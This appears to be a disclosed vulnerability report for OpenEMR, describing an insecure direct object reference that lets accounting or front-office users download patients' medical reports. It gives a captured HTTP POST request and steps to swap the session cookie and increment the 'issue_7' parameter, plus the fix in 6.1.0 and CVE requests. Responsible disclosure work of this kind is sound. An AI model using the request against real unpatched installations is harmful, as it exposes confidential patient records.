Accounting User Can Download Patient Reports in openemr in openemr/openemr
Mar 11th 2022
Insecure Direct Object Reference
Non-privileged users (the accounting and front-office roles) can download patient reports, including medical records and attached documents, by sending a request to a vulnerable end-point. No access control is enforced on that end-point, so any authenticated OpenEMR user can retrieve patient records simply by tampering with the “issue_7” parameter: setting it to any other valid number returns the corresponding patient's records, and incrementing it enumerates them.
Implement an ACL check so that only authorized OpenEMR users are able to download patient documents from the vulnerable end-point.
Aden Yap Chuen Zhen (email@example.com)
Log in to OpenEMR as Admin and capture the POST request to the following end-point:
In Burp, the “OpenEMR” cookie and the “issue_7” parameter of the captured HTTP POST request can be tampered with.
Host: 192.168.0.141
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://192.168.0.141
Connection: close
Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php
Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG
Upgrade-Insecure-Requests: 1

include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F
Replace the “OpenEMR” cookie with the accountant's session cookie and increment the “issue_7” parameter to any other valid number, e.g. “issue_7=/15/”, to access that patient's documents as the accountant.
This has been fixed in master and rel-610 branches and will be in OpenEMR's next production release (6.1.0).
OpenEMR 6.1.0 was released today, which fixes this issue.
Hi, kindly issue a CVE for this vulnerability. Tq
Dear @admin, I've already pinged the maintainer; could you please follow up on the CVE creation? Tq
Dear @maintainer, could you kindly confirm that CVE can be created for this report? Tq
Hi, I consent to creation of CVE.